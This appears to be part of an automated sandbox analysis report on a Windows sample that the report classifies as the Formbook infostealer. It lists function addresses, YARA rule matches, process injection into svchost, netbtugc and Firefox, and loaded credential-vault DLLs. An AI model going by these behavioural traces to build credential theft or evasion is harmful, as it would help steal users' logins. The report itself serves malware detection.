            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEDAC61_2_03AEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB3A6C1_2_03AB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFA491_2_03AFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF7A461_2_03AF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A01_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0A9A61_2_03B0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A569621_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A499501_2_03A49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B9501_2_03A5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A268B81_2_03A268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A438E01_2_03A438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E8F01_2_03A6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAD8001_2_03AAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A428401_2_03A42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4A8401_2_03A4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFFB11_2_03AFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41F921_2_03A41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32FC81_2_03A32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A82F281_2_03A82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60F301_2_03A60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFF091_2_03AFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4F401_2_03AB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A49EB01_2_03A49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52E901_2_03A52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFCE931_2_03AFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFEEDB1_2_03AFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFEE261_2_03AFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40E591_2_03A40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A58DBF1_2_03A58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3ADE01_2_03A3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5FDC01_2_03A5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4AD001_2_03A4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF7D731_2_03AF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A43D401_2_03A43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF1D5A1_2_03AF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0CB51_2_03AE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30CF21_2_03A30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFCF21_2_03AFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB9C321_2_03AB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40C001_2_03A40C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EC12ED6_2_02EC12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E3D2F06_2_02E3D2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E3B2C06_2_02E3B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E252A06_2_02E252A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EC02746_2_02EC0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EE03E66_2_02EE03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E2E3F06_2_02E2E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E6739A6_2_02E6739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E0D34C6_2_02E0D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDA3526_2_02EDA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED132D6_2_02ED132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED70E96_2_02ED70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDF0E06_2_02EDF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ECF0CC6_2_02ECF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E270C06_2_02E270C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED81CC6_2_02ED81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EE01AA6_2_02EE01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E2B1B06_2_02E2B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EEB16B6_2_02EEB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E5516C6_2_02E5516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E0F1726_2_02E0F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E101006_2_02E10100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EBA1186_2_02EBA118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E3C6E06_2_02E3C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED16CC6_2_02ED16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E1C7C06_2_02E1C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDF7B06_2_02EDF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E207706_2_02E20770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E447506_2_02E44750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ECE4F66_2_02ECE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E114606_2_02E11460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED24466_2_02ED2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDF43F6_2_02EDF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EBD5B06_2_02EBD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EE05916_2_02EE0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED75716_2_02ED7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E205356_2_02E20535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ECDAC66_2_02ECDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E65AA06_2_02E65AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EBDAAC6_2_02EBDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E1EA806_2_02E1EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E93A6C6_2_02E93A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDFA496_2_02EDFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED7A466_2_02ED7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E5DBF96_2_02E5DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED6BD76_2_02ED6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E3FB806_2_02E3FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDFB766_2_02EDFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDAB406_2_02EDAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E238E06_2_02E238E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E4E8F06_2_02E4E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E068B86_2_02E068B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E228406_2_02E22840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E2A8406_2_02E2A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E229A06_2_02E229A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EEA9A66_2_02EEA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E369626_2_02E36962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E299506_2_02E29950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E3B9506_2_02E3B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDEEDB6_2_02EDEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E29EB06_2_02E29EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E32E906_2_02E32E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDCE936_2_02EDCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E20E596_2_02E20E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDEE266_2_02EDEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E12FC86_2_02E12FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDFFB16_2_02EDFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E21F926_2_02E21F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E94F406_2_02E94F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E62F286_2_02E62F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E40F306_2_02E40F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDFF096_2_02EDFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E10CF26_2_02E10CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EDFCF26_2_02EDFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02EC0CB56_2_02EC0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E99C326_2_02E99C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E20C006_2_02E20C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E1ADE06_2_02E1ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E3FDC06_2_02E3FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E38DBF6_2_02E38DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED7D736_2_02ED7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E23D406_2_02E23D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02ED1D5A6_2_02ED1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02E2AD006_2_02E2AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_004215E06_2_004215E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_004230EE6_2_004230EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_004230F06_2_004230F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0041C7C76_2_0041C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0041C7D06_2_0041C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0041C9F06_2_0041C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0041AA706_2_0041AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00439FD06_2_00439FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C2A0AF6_2_02C2A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C2B8B46_2_02C2B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C2B9D66_2_02C2B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C2ADD86_2_02C2ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02C2BD6C6_2_02C2BD6C
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059D95FC7_2_059D95FC
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059DE4157_2_059DE415
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059DFF257_2_059DFF25
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059DFF237_2_059DFF23
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059D96057_2_059D9605
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059F6E057_2_059F6E05
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059D78A57_2_059D78A5
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeCode function: 7_2_059D98257_2_059D9825
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000151057EE0AF8_2_00000151057EE0AF
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000151057EF8B48_2_00000151057EF8B4
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000151057EFD6C8_2_00000151057EFD6C
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000151057EEDD88_2_00000151057EEDD8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000151057EF9D68_2_00000151057EF9D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 250 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 87 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 36 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E67E54 appears 85 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E9F290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E0B970 appears 248 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E8EA12 appears 84 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E55130 appears 36 times
            Source: 8htbxM8GPX.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4190605471.0000000002850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4190493627.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2018221773.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4193347183.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4191461171.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2018302081.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/9
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeFile created: C:\Users\user\AppData\Local\Temp\aut552D.tmpJump to behavior
            Source: 8htbxM8GPX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000006.00000003.2196216445.000000000293F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2195027011.000000000291F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4190676989.000000000293F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 8htbxM8GPX.exeReversingLabs: Detection: 63%
            Source: unknownProcess created: C:\Users\user\Desktop\8htbxM8GPX.exe "C:\Users\user\Desktop\8htbxM8GPX.exe"
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8htbxM8GPX.exe"
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8htbxM8GPX.exe"Jump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\8htbxM8GPX.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exeSection loaded: mswsock.dllJump to behavior
